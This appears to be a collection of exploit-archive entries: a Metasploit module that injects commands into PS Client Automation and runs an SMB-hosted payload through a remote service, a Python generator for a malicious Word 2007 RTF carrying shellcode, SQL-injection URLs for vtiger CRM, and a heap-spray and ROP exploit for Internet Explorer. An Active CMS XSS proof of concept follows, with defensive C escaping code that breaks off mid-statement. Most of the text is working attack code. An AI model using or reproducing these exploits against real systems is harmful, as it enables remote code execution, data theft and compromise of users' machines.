# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
# Date: 2014-10-01
# Exploit Author: Ben Turner
# Vendor Homepage: Previously HP, now http://www.persistentsys.com/
# Version: 7.9, 8.1, 9.0, 9.1
# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
# CVE-2015-1497
# CVSS: 10

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	# Exploit mixins should be called first
	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::EXE	
	include Msf::Auxiliary::Report

	# Aliases for common classes
	SIMPLE = Rex::Proto::SMB::Client
	XCEPT  = Rex::Proto::SMB::Exceptions
	CONST  = Rex::Proto::SMB::Constants


	def initialize
		super(
			'Name'        => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
			'Description' => %Q{
				This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. 
			},
			'Author'         => [ 'Ben Turner' ],
			'License'        => BSD_LICENSE,
			'References'  =>
				[
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'WfsDelay'     => 10,
					'EXITFUNC' => 'process'
				},
			'Payload'     => { 'BadChars' => '', 'DisableNops' => true },
			'Platform'    => ['win'],
			'Targets'         =>
				[
					[ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}]
				],
			'DefaultTarget'   => 0,
			'DisclosureDate' => 'January 10 2014'
		)

		register_options([
			OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']),
			OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']),
			Opt::RPORT(3465),
		], self.class)

	end

	def exploit

		createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
		createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\""
		createservice << "\x22\x00\x00\x00"

		startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
		startservice << "Nvdkit service start test"
		startservice << "\x22\x00\x00\x00"

		removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00"
		removeservice << "Nvdkit service remove test"
		removeservice << "\x22\x00\x00\x00"

		def filedrop()
			begin
				origrport = self.datastore['RPORT']
				self.datastore['RPORT'] = 445
				origrhost = self.datastore['RHOST']
				self.datastore['RHOST'] = self.datastore['SMBServer']
				connect()
				smb_login()
				print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe ...")
				self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
				exe = generate_payload_exe
				fd = smb_open("\\installservice.exe", 'rwct')
				fd << exe
				fd.close

				self.datastore['RPORT'] = origrport
				self.datastore['RHOST'] = origrhost
			
			rescue Rex::Proto::SMB::Exceptions::Error => e
				print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")	
				abort()
			end
		end

		def filetest()
			begin
				origrport = self.datastore['RPORT']
				self.datastore['RPORT'] = 445
				origrhost = self.datastore['RHOST']
				self.datastore['RHOST'] = self.datastore['SMBServer']
				connect()
				smb_login()
				print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
				self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}")
				file = "\\installservice.exe"
				filetest = smb_file_exist?(file)
				if filetest
					print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n")
				else
					print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!")
						
				end

				self.datastore['RPORT'] = origrport
				self.datastore['RHOST'] = origrhost
			
			rescue Rex::Proto::SMB::Exceptions::Error => e
				print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n")	
				abort()
			end
		end

		begin
			filedrop()
			filetest()
			connect()
			sock.put(createservice)
			print_status("Creating the callback payload and installing the remote service")
			disconnect
			sleep(5)
			connect()
			sock.put(startservice)
			print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service")
			disconnect
			sleep(30)
			connect
			sock.put(removeservice)
			disconnect

		rescue ::Exception => e
			print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n")	
			abort()
		
		end
	end
end
            
# Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass
# Date : 28/02/2015 
# Author : R-73eN
# Software : Microsoft Office Word 2007 
# Tested : Windows 7 Starter


import sys
# Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode .
shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7'
#filecontent
content="{\\rtf1"
content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}"
content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par"
content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par"
content+="{\\object\\objocx"
content+="{\\*\\objdata"
content+="\n"
content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000"
content+="00000000000000000E0000"
content+="\n"
content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000"
content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF"
content+="FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400"
content+="72007900000000000000000000000000000000000000000000000000000000000000000000000000"
content+="000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628"
content+="0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00"
content+="49006E0066006F000000000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000600000000000000"
content+="03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF"
content+="00000000000000000000000000000000000000000000000000000000000000000000000001000000"
content+="160000000000000043006F006E00740065006E007400730000000000000000000000000000000000"
content+="000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF"
content+="FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000"
content+="00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000"
content+="0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000"
content+="11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
content+="FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000004C00690073007400"
content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000"
content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600"
content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080"
content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974"
content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000"
content+="000000000000"
content+= 'cb818278'# Address=788281CB jmp esp |  {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll)
content+="9090909090909090" #nops
content+= shellcode
#junk
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000"
content+="00000000000000"
content+="\n"
content+="}"
content+="}"
content+="}"
banner = "\n\n"
banner +="  ___        __        ____                   _    _  \n"  
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __        / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \      / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |    / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_|[] /_/   \_\_____|\n\n"
print banner
if(len(sys.argv) < 2):
	print '\n Usage : exploit.py filename.rtf'
else:
	filename = sys.argv[1]
	f=open(filename,"w")
	f.write(content)
	f.close()
	print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'
            
source: https://www.securityfocus.com/bid/49948/info

vtiger CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1--

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2--

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5--

http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4-- 
            
source: https://www.securityfocus.com/bid/49964/info

Microsoft Internet Explorer is prone to a remote memory-corruption vulnerability.

Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. 

<html>
<head>
</head>

<body>


<script type="text/javascript">
<!--

//originally, windows 7 compatible calc.exe shellcode from SkyLined
var scode = "removed";

var newstack,newstackaddr;
var fakeobj;

var spray,spray2,selarray,readindex,readaddr,optarryaddr;
var elms = new Array();

var optarray;

var mshtmlbase;

//option object that is to be corrupted
var corruptedoption;
var corruptedoptionaddr;
var corruptaddr;

function strtoint(str) {
    return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}

function inttostr(num) {
    return String.fromCharCode(num%65536,Math.floor(num/65536));
}

function crash() {
    var o = new Option();
    selarray[99].options.add(o,-0x20000000);
}

function readmem(addr) {
    if(addr < readaddr) alert("Error, can't read that address");
    return strtoint(spray[readindex].substr((addr-readaddr)/2,2));
}

function readmem2(addr,size) {
    if(addr < readaddr) alert("Error, can't read that address");
    return spray[readindex].substr((addr-readaddr)/2,size/2);
}

function overwrite(addr) {
    try {
        var index = (addr-optarryaddr)/4 - 0x40000000;
        selarray[99].options.add(optarray.pop(),index);
    } catch(err) {}   
}

function getreadaddr() {
    readaddr = 0;
    var indexarray = new Array();
    var tmpaddr = 0;
    var i,index;
    
    index = readmem(tmpaddr);
    indexarray.push(index);
    
    while(1) {
        tmpaddr += 0x100000;
        index = readmem(tmpaddr);
        for(i=0;i<indexarray.length;i++) {
            if(indexarray[i]==index+1) {
                readaddr = readmem(tmpaddr-0x24)-i*0x100000+0x24;
                return 1;
            } else if(indexarray[i]==index-1) {
                readaddr = readmem(tmpaddr-0x20)-i*0x100000+0x24;
                return 1;               
            }
        }
        indexarray.push(index);
    }
}

//leverages the vulnerability into memory disclosure
function initread() {
    //overwrite something in a heap spray slide
    try {
        selarray[99].options.add(optarray.pop(),-100000000/4);
    } catch(err) {}
    
    //now find what and where exactly we overwrote
    readindex = -1;
    var i;
    for(i=1;i<200;i++) {
        if(spray[0].substring(2,spray[0].length-2)!=spray[i].substring(2,spray[0].length-2))
{
            readindex = i;
            break;
        }
    }

    if(readindex == -1) {
        alert("Error overwriting first spray");
        return 0;
    }

    var start=2,len=spray[readindex].length-2,mid;
    while(len>10) {
        mid = Math.round(len/2);
        mid = mid - mid%2;
        if(spray[readindex].substr(start,mid) != spray[readindex-1].substr(start,mid)) {
            len = mid;
        } else {
            start = start+mid;
            len = len-mid;
            //if(spray[readindex].substr(start,mid) == spray[readindex-1].substr(start,mid)) alert("error");
        }
    }
    
    for(i=start;i<(start+20);i=i+2) {
        if(spray[readindex].substr(i,2) != spray[readindex-1].substr(i,2)) {
            break;
        }
    }
    
    //overwrite the string length
    try {
        selarray[99].options.add(optarray.pop(),-100000000/4-i/2-1);
    } catch(err) {}
       
    if(spray[readindex].length == spray[readindex-1].length) alert("error overwriting string length");
    
    //readaddr = strtoint(spray[readindex].substr((0x100000-4-0x20+4)/2,2))+0x24;
    getreadaddr();
    
    optarryaddr = readaddr + 100000000 + i*2;

    return 1;   
}

function trysploit() {
    //create some helper objects
    for(var i =0; i < 100; i++) {
        elms.push(document.createElement('div'));
    }

    //force the option cache to rebuild itself
    var tmp1 = selarray[99].options[70].text;

    //overwrite the CTreeNode pointer
    overwrite(corruptaddr);
    //read the address of the option object we overwrote it with
    var optadr = readmem(corruptaddr);
    //delete the option object...
    selarray[99].options.remove(0);
    
    CollectGarbage();
    
    //...and allocate some strings in its place
    for(var i = 0; i < elms.length; i++) {
        elms[i].className = fakeobj;
    }

    //verify we overwrote the deleted option object successfully
    if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0;

    alert("success, calc.exe should start once you close this message box");

    //now do something with the corrupted option object
    corruptedoption.parentNode.click();
}

function hs() {
    
    //first heap spray, nop slide + shellcode   
    spray = new Array(200);
    var pattern = unescape("%u0C0C%u0C0C");
    while(pattern.length<(0x100000/2)) pattern+=pattern;
    pattern = pattern.substr(0,0x100000/2-0x100);
    for(var i=0;i<200;i++) {
        spray[i] = [inttostr(i)+pattern+scode].join("");
    }

    //fill small gaps, we want everything _behind_ our heap spray so that we can read it
    var asmall = new Array(10000);
    pattern = "aaaa";
    while(pattern.length<500) pattern+=pattern;
    for(var i=0;i<10000;i++) {
        asmall[i]=[pattern+pattern].join("");
    }
    
    //create some select and option elements
    selarray = new Array(100);
    for(var i=0;i<100;i++) {
        selarray[i] = document.createElement("select");
        for(var j=0;j<100;j++) {
            var o = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
            selarray[i].options.add(o,0);
        }
    }
    
    //create some extra option elements
    optarray = new Array(10000);
    for(var i=0;i<10000;i++) {
        optarray[i] = new Option("oooooooooooooooooo","ooooooooooooooooooooo");
    }
    
    //enable memory disclosure
    if(initread()==0) return;

    //force the option cache to rebuild itself
    var tmp1 = selarray[99].options[60].text;
    
    //get the address of some option element to be corrupted, also remove it from its select element, we don't want anything else messing with it
    corruptedoptionaddr = readmem(optarryaddr+60*4);
    corruptedoption = selarray[99].options[60];
    selarray[99].options.remove(60);
    
    //get the base address of mshtml.dll based on the vtable address inside the option object
    mshtmlbase = readmem(corruptedoptionaddr)-0xFC0C0;
    alert("base address of mshtml.dll : " + mshtmlbase.toString(16));

    //we'll overwrite the pointer to the CTreeNode object, compute its address
    corruptaddr = corruptedoptionaddr+0x14;

    //second heap-spray, this one will act as a stack (we'll exchange the stack pointer with a pointer into this)
    spray2 = new Array(200);   

    //some address that is likely to be inside the "stack"
    newstackaddr = optarryaddr+100000000;
    newstackaddr-=newstackaddr%0x1000;
    newstackaddr+=0x24;

    //assemble the "stack" so that it calls VirtualProtect on the first shellcode and then jumps into it through return-oriented programming
    newstack = inttostr(newstackaddr+0x10)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(newstackaddr+0x14)+inttostr(mshtmlbase+0x14EF7)+inttostr(mshtmlbase+0x1348)+inttostr(mshtmlbase+0x801E8)+inttostr(readaddr+0x100000-0x24)+inttostr(0x100000)+inttostr(0x40)+inttostr(readaddr+0x1000)+inttostr(readaddr+0x101000)+unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA")+inttostr(mshtmlbase+0x1B43F);
    while(newstack.length<(0x1000/2))
newstack+=unescape("%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA%uAAAA");
    newstack = newstack.substr(0,0x1000/2);
    while(newstack.length<(0x100000/2)) newstack+=newstack;
    newstack = newstack.substr(0,0x100000/2-0x100);
    for(var i=0;i<200;i++) {
        spray2[i] = [newstack].join("");
    }
    
    //construct a fake object which will replace a deleted option object (it has to be the same size)
    //fakeobj = unescape("%u4141%u4141")+inttostr(newstackaddr)+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
    fakeobj = unescape("%u4141%u4141%u4141%u4141")+unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
    
    //loop until we either achieve command execution or fail
    for(var i=0;i<100;i++) {
        trysploit();
    }
    
    alert("Exploit failed, try again");

}


hs();


-->
</script>


</body>
</html>
            
source: https://www.securityfocus.com/bid/50001/info

Active CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Active CMS 1.2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/activecms/admin/admin?action=module&mod='<script>alert(document.cookie)</script>
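The PoC above works because the `mod` value is written into the generated page unchanged, so the apostrophe and the `<script>` tag are interpreted as markup. As an added example (not Active CMS code), the following C shows the body-context HTML encoding that turns that value into inert text, with a check that no tag-opening or quote-closing character survives. `html_escape()` and `has_markup_chars()` are names of my own, and `POC_MOD` is the decoded parameter value constructed from the URL above. Attribute values and JavaScript contexts need their own, context-specific encoders; this one covers text nodes and quoted attributes only.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Escape the characters that let untrusted text break out of an HTML text
 * node or a double/single-quoted attribute value. Returns the escaped
 * length, or -1 if `out` cannot hold the result plus a terminating NUL. */
int html_escape(const char *in, char *out, size_t outsz) {
    size_t o = 0;
    for (; *in; in++) {
        const char *rep = NULL;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t need = rep ? strlen(rep) : 1;
        if (o + need >= outsz) return -1;   /* keep room for the NUL */
        if (rep) memcpy(out + o, rep, need);
        else     out[o] = *in;
        o += need;
    }
    out[o] = '\0';
    return (int)o;
}

/* True if the text still contains a character that can open a tag or close
 * a quoted attribute; after html_escape() this must be false. */
bool has_markup_chars(const char *s) {
    return strpbrk(s, "<>\"'") != NULL;
}

/* The `mod` value from the PoC URL as the server sees it after URL decoding
 * (constructed here for the demonstration). */
static const char *const POC_MOD = "'<script>alert(document.cookie)</script>";

int main(void) {
    char safe[256];
    int n = html_escape(POC_MOD, safe, sizeof safe);
    printf("raw:     %s (markup chars: %s)\n", POC_MOD,
           has_markup_chars(POC_MOD) ? "yes" : "no");
    printf("escaped: %s (%d bytes, markup chars: %s)\n", safe, n,
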